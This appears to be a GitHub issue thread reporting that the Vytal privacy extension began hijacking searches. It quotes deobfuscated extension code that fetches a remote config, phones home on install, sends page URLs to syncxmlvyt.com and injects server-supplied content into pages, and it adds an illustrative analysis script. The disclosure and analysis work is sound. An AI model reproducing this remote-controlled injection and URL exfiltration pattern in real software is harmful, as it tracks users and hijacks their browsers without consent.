
[URGENT] 🚨 Vytal Extension is Now Acting Maliciously

Open GiaNTizmO opened this issue 5 months ago • 1 comments

🧨 Summary

The Vytal extension has begun exhibiting highly suspicious and malicious behavior.

โš ๏ธ Unfortunately, at the time of issue creation, the redirect was disabled and I have fragmentary data, without taking into account all technical data Without recording the video, I checked that it was the Vytal extension that was doing this - I launched the browser in incognito mode with only the single Vytal extension.

Originally intended to mask browser fingerprinting, the extension now:

  1. Intercepts user searches
  2. Sends full query URLs to third-party tracking domains
  3. Redirects users to suspicious monetization or search hijack domains

This poses a serious privacy and security concern to all users of the extension.

โ–ถ๏ธ Video demonstration:

Unfortunately, the recording is not of the best quality. I was planning to re-record the video without additional downloaded plugins, but at the time of creating the issue, the redirect was disabled and now I can't make a new video with a demo.

https://github.com/user-attachments/assets/c2a5c24d-8cae-4cb6-9777-97d6e167a25c

๐Ÿ•ต๏ธโ€โ™‚๏ธ Observed Behavior

  1. When visiting https://www.google.com and searching for something (e.g. test google search text), the extension sends the full query to:
     https://syncxmlvyt.com/analytics.php?p=html&u=https%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dtest%2Bgoogle%2Bsearch%2Btext%26...

  2. The request contains:
     • Full visited URL (u)
     • Potentially sensitive query parameters

  3. Redirections observed (before they were disabled): syncxmlvyt.com → finditonlinenow.com → a PDF-themed domain → ends on Yahoo search page
     • Behavior resembles search hijacking or ad injection networks

🔬 Code Analysis (from background.bundle.js)

```js
const l = "https://syncxmlvyt.com/";
// Fetch the remote config; cached in chrome.storage.local for 5 minutes (3e5 ms)
// unless a forced refresh (a === true) is requested
async function i(a = !1) {
	const r = `${l}config.php?` + Date.now(),
		{
			config: o,
			configTimestamp: e
		} = await chrome.storage.local.get(["configTimestamp", "config"]);
	if (!a && Date.now() - (e || 0) < 3e5) return o;
	const t = await fetch(r).then(n => n.json());
	return chrome.storage.local.set({
		config: t,
		configTimestamp: Date.now()
	}), t
}
// Forced fetch at startup; content scripts request the config via "get-config"
i(!0), chrome.runtime.onMessage.addListener((a, r, o) => {
	if (a === "get-config") return i().then(e => o(e)), !0
}), chrome.runtime.onInstalled.addListener(function(a) {
	// Phone home once on first install
	a.reason === "install" && fetch(`${l}install.php`)
})
```
  • On every page visit, the extension fetches a remote configuration.
  • The remote config appears to dynamically control behavior.
  • Upon install, it phones home via install.php.
  • No user consent is requested before sending browser activity externally.

โ— Potential Consequences

  • Leak of search terms and browsing data to third-party servers
  • Privacy violation: Full query strings sent to unknown external server
  • Monetization via hijack: Redirection to monetized or phishing-like pages
  • Violation of Chrome Web Store policies:

Image

  • Misuse of permissions
  • Undisclosed tracking

🔚 Closing Note

This extension has shifted from a privacy tool into a browser hijacker. The community deserves transparency.

GiaNTizmO avatar Jun 10 '25 00:06 GiaNTizmO

UPD:

🚨 Malicious DOM Injection via Remote Configuration

Further investigation of the content_script.js in the Vytal extension reveals dynamic DOM manipulation based on external configuration, fetched from https://syncxmlvyt.com/config.php.

📦 Code Snippet:

```js
chrome.runtime.sendMessage("get-config", s => {
		// Expand the first {a.b.c} placeholder in a rule URL with the
		// URL-encoded value of window.a.b.c (e.g. {location.href})
		function u(r) {
			return r.replace(/{[\w.]+}/, c => {
				const l = c.substr(1, c.length - 2).split(".").reduce((e, n) => e[n], window);
				return encodeURIComponent(l)
			})
		}
		const h = document.location + "";
		// g: wrapper defined elsewhere in the bundle, not included in this excerpt
		g(() => {
			function r() {
				// For every rule whose pattern matches the page URL, hide each
				// selected element, fetch the remote content, and write it into
				// the attribute named by the rule (innerText, src, href, ...)
				for (const o of s) new RegExp(o.pattern, "gi").test(h) && [...document.querySelectorAll(o.selector)].filter(t => !t.hasAttribute("skip-element")).forEach(t => {
					const i = t.style.display;
					t.style.display = "none", t.setAttribute("skip-element", !0), fetch(u(o.url)).then(a => a.text()).then(a => {
						const d = a.trim();
						d && (t[o.attr] = d)
					}).catch(() => {}).then(() => t.style.display = i)
				})
			}
			// Re-run on every DOM change so newly added elements are also rewritten
			r(), new MutationObserver(() => r()).observe(document.body, {
				childList: !0,
				subtree: !0
			})
		})
	})
```

🧬 What it does:

  • Dynamically loads configuration rules from a remote server (syncxmlvyt.com).
  • Each rule includes:
    • A URL pattern to match (e.g., google\.com)
    • A CSS selector (selector)
    • A remote url to fetch replacement content from
    • A target attribute (attr, such as innerText, src, etc.)
  • Injects remote content into matching DOM elements.
  • Uses a MutationObserver to persistently monitor and reinject on any DOM changes.

🔥 Real-world Impact:

  • Remote server (syncxmlvyt.com) controls what content appears on user pages.
  • Can be used for:
    • Injecting ads, phishing forms, fake buttons
    • Hijacking PDF links or download buttons
    • Stealth content replacement (e.g., search redirection)
  • This behavior is stealthy, dynamic, and policy-violating.

โš ๏ธ Privacy Violation:

  • User data such as location.href is interpolated and sent to the remote URL.

This functionality turns Vytal into a remote-controlled content injector, directly violating Chrome Web Store policies on user data privacy and behavior disclosure.

We urge maintainers and the Chrome Web Store review team to investigate immediately.

GiaNTizmO avatar Jun 10 '25 00:06 GiaNTizmO
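As an added illustration (not code from the issue or from the extension), a Python model of the content script's rule evaluation above: it expands a `{location.href}` placeholder the way u() does and reports, for each firing rule, which host is contacted, what page data is sent and which DOM attribute the response would overwrite. The config, hostname and page state are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, quote, urlparse

# Constructed sample config in the shape the content script consumes
# (pattern / selector / url / attr); the host is a placeholder, not the
# real one from the issue.
SAMPLE_CONFIG = [
    {"pattern": "google\\.com", "selector": "h3",
     "url": "https://REMOTE-HOST.example/analytics.php?p=html&u={location.href}",
     "attr": "innerText"},
    {"pattern": "example\\.org", "selector": "a[href$='.pdf']",
     "url": "https://REMOTE-HOST.example/pdf.php?u={location.href}",
     "attr": "href"},
]

PLACEHOLDER = re.compile(r"\{([\w.]+)\}")

def expand_template(url_template, window):
    """Mirror the snippet's u(): resolve the first {a.b.c} placeholder by
    walking a window-like dict and URL-encode the result. Like the
    original non-global regex, only the first placeholder is expanded."""
    def lookup(match):
        value = window
        for part in match.group(1).split("."):
            value = value[part]
        return quote(str(value), safe="")
    return PLACEHOLDER.sub(lookup, url_template, count=1)

def firing_rules(config, page_url):
    """Rules whose pattern matches the page URL (new RegExp(pattern, 'gi'))."""
    return [r for r in config if re.search(r["pattern"], page_url, re.IGNORECASE)]

def leak_report(config, page_url, window):
    """For each firing rule: remote host contacted, page data sent, and
    which DOM attribute the fetched response would overwrite."""
    report = []
    for rule in firing_rules(config, page_url):
        target = urlparse(expand_template(rule["url"], window))
        report.append({
            "host": target.netloc,
            "sent": {k: v[0] for k, v in parse_qs(target.query).items()},
            "selector": rule["selector"],
            "attr": rule["attr"],
            # href/src/innerHTML let the server redirect the user or inject markup
            "navigation_control": rule["attr"] in {"href", "src", "innerHTML"},
        })
    return report

if __name__ == "__main__":
    url = "https://www.google.com/search?q=test+google+search+text"
    for entry in leak_report(SAMPLE_CONFIG, url, {"location": {"href": url}}):
        print(entry)
```

Pointing it at a real extension's cached config (chrome.storage.local key `config`) shows which sites and elements the remote server is currently targeting without loading the extension.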

Image

kiwiflydream avatar Jun 25 '25 14:06 kiwiflydream

Thanks for the report, that's too bad.

Any malicious behavior related to stealing account cookies and passwords?

skypoc avatar Jul 10 '25 00:07 skypoc

I've created an open source alternative extension:

https://chromewebstore.google.com/detail/fcalilbnpkfikdppppppchmkdipibalb

https://github.com/www1z4rd/cloaq

www1z4rd avatar Jul 20 '25 20:07 www1z4rd

Thank you for your research into this, seems it was just marked as malware on brave as well

PixelMelt avatar Jul 24 '25 20:07 PixelMelt

Was it replaced in the new update? Or what's the problem with building from these source codes?

0zd0 avatar Jul 24 '25 20:07 0zd0

> I've created an open source alternative extension:
>
> https://chromewebstore.google.com/detail/fcalilbnpkfikdppppppchmkdipibalb
>
> https://github.com/www1z4rd/cloaq

Thanks bro ♥️♥️

HATOSHAH avatar Jul 31 '25 01:07 HATOSHAH